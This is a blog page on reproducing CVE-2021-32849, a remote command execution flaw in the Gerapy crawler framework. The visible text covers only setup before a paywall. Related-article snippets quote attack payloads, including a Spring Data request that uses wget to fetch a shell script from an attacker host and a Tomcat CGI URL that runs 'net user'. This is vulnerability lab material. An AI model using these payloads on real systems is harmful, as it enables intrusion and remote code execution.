CVE-2021-32849 Gerapy远程命令执行漏洞复现

CVE-2021-32849：Gerapy分布式爬虫管理框架远程命令执行漏洞分析与复现

最新推荐文章于 2023-10-12 17:26:37 发布

原创

最新推荐文章于 2023-10-12 17:26:37 发布 · 1.3k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#django #python #后端

文章详细介绍了CVE-2021-32849，这是一个影响Gerapy <= 0.9.7版本的远程命令执行漏洞。通过未正确清理的project_clone端点输入，认证用户可执行任意命令。内容包括漏洞描述、影响、环境搭建、漏洞分析、复现步骤以及修复方案。作者提醒用户升级到0.9.8及以上版本以修复该问题。

0x01 漏洞描述

Gerapy是基于Scrapy；Scrapyd；Scrapyd-Client；Scrapyd-API；Django和Vue.js的分布式爬虫管理框架。

本文利用的漏洞在Gerapy <=0.9.7的版本中产生的影响源于程序没有正确清理通过project_clone端点传递给Popen的输入。经过身份验证的用户可以执行任意命令。

0x02 漏洞影响

编号：CVE-2021-32849

版本：Gerapy <=0.9.7

0x03 环境搭建

下载地址:

https://github.com/Gerapy/Gerapy/releases

服务器：kali-linux 2022.1

攻击机：Windows 10

在服务器执行以下命令进行安装gerapy

pip install gerapy==0.9.7 -i http://pypi.douban.com/simple --trusted-host 
pypi.douban.com  
pip install scrapyd -i http://pypi.douban.com/simple --trusted-host pypi.douban.com

通过以下命令设置gerapy的相关参数

gerapy init ##初始化 
cd gerapy ##进入工作目录 
gerapy migrate ##自动创建数据库 
gerapy createsuperuser ##设置管理员账号密码 
gerapy runserver 0.0.0.0：8000 ##开启服务

浏览器访问URL地址，

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

长白山攻防实验室

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

精选资源

CVE-2021-25281：链接CVE-2021-25281和CVE-2021-25282以利用SaltStack

03-03

**CVE-2021-25281** 是一个远程代码执行漏洞，主要存在于盐栈的`salt-api`组件中。这个组件是盐栈的RESTful API接口，用于与其他系统集成。由于不安全的序列化和反序列化过程，攻击者可以通过发送精心构造的HTTP请求...

精选资源

apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具

04-21

检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt（把url按一行一个保存到file.txt中）结果有可能如下

参与评论您还未登录，请先登录后发表或查看评论

Vulhub Supervisord 远程命令执行漏洞复现

weixin_53696027的博客

06-07

518

Vulhub Supervisord 远程命令执行漏洞复现

vulhub-CVE-2018-1273远程命令执行漏洞复现

m0_62008601的博客

09-23

1483

Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听，这时候用nc进行监听的话，收不到反弹的shell。发送命令之后返回500说明执行成功，接着我们登录到doker容器看到success文件成功被创建，说明漏洞存在。执行之后如果没成功反弹shell ，可以先执行赋予文件权限的命令。开启监听之后，再修改请求命令，让靶机执行木马文件上线。

CVE-2017-8464远程命令执行漏洞复现

u011215939的博客

12-20

1143

CVE-2017-8464远程命令执行漏洞复现前言 2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危漏洞描述攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用

HFS远程命令执行漏洞复现

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

05-28

6137

漏洞程序下载地址:Http File Server 这里说一下，再Windows server 2003中复现时，我直接使用Administrator用户登录，然后复现，未出现权限问题。再Windows 10中尝试复现时发现权限不足，需要以管理员权限执行漏洞程序。运行程序截图如下尝试访问该软件提供的web服务 web服务是这个样子的，这个web服务的搜索处存在漏洞一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos

Typora-远程命令执行漏洞复现-CVE-2023-2317

apple_52661176的博客

08-31

527

Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞，具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件，来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件，或者从一个恶意网页复制文本并将其粘贴到Typora中，那么攻击者可以通过在＜embed＞标签中引用update.html来利用这个漏洞。

CVE-2021-22205——Gitlab 远程命令执行漏洞复现

热门推荐

LiBai'S BLOG

11-10

1万+

CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .

Gerapy 远程命令执行（CVE-2021-32849）分析和复现

鸣蜩十四的博客

11-30

1264

简介 Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。漏洞描述该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。影响版本 Gerapy <= 0.9.7 代码分析此次漏洞产生于gerapy/server/core/views.py文件关键代码 @api_view(['POST']) @permission_classes([IsAuthenticated]) def pr

Webmin远程命令执行漏洞复现

yuan_boss的博客

10-12

1355

详细的来说，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码，该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP，注意user=rootxx这部分，如果写的是user=root，肯定不能成功注入，必须是目标网站的服务器中不存在的用户，否则就会命令执行失败。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。

CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境

04-18

本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞的复现环境。将文件下载到本地，直接运行tomcat 启动服务器，地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果，请勿非法使用，仅供学习研究

gerapy漏洞复现(CVE-2021-43857)

weixin_45778886的博客

01-05

5255

简介 Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。漏洞描述该漏洞源于程序没有正确清理通过project/id/parse端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。影响版本 Gerapy <= 0.9.8 代码分析 http://www.ctfiot.com/14043.html 漏洞复现开启环境弱口令：admin/admin进入后台，点击项目管理。抓包反弹shell 修改请求包，反弹shell。反弹成功

Drupal远程命令执行漏洞复现

BerL1n

12-29

1090

time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞，影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞，影响8.x的Drupal Core。漏洞检测针对该漏洞，可采用两种方法进行检测：方法一：登陆Drupal管理后台，查看内核版本是8.x，且版本号低于8.3.4，则存在该漏洞；否则，不存在该漏洞；方法二：在Drupal根目录下找到文件/core/lib/Drupal/Com

Spring Data Commons远程命令执行漏洞复现（CVE-2018-1273）

wutiangui的博客

09-10

1217

下载文件请求包：username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users，注册，BP抓包。在sh文件所在目录开启http服务。2.开启http服务。

CVE-2019-15107 Webmin远程命令执行漏洞复现

EC_Carrot的博客

03-03

345

漏洞概括 Webmin的是一个用于管理类Unix的系统的管理配置工具，具有网络页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码。影响版本： Webmin <= 1.920 环境搭建自己用docker搭了个1.910版本的Webmin，具体操作… 漏洞的触发需要开启密码重置功能，需要把允许用户使用旧密码设置新密码的选项给选上。登录

S2-062 远程命令执行漏洞复现(cve-2021-31805)

m0_52400001的博客

04-22

3281

S2-062 远程命令执行漏洞复现(cve-2021-31805)

PHP imap 远程命令执行漏洞复现（CVE-2018-19518）

ch258563的博客

05-30

635

PHP imap 远程命令执行漏洞复现（CVE-2018-19518）

网康 NS-ASG安全网关存在远程命令执行漏洞复现

薛定谔嘚喵博客

10-09

760

网康应用安全网关系统存在远程命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。

CVE-2021-31805 Apache Struts 2远程命令执行漏洞检测工具

资源摘要信息: "Apache Struts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具" Apache Struts 2是一个广泛使用的开源框架，用于开发基于MVC（模型-视图-控制器）架构的Java Web应用程序。CVE-2021-31805是一个...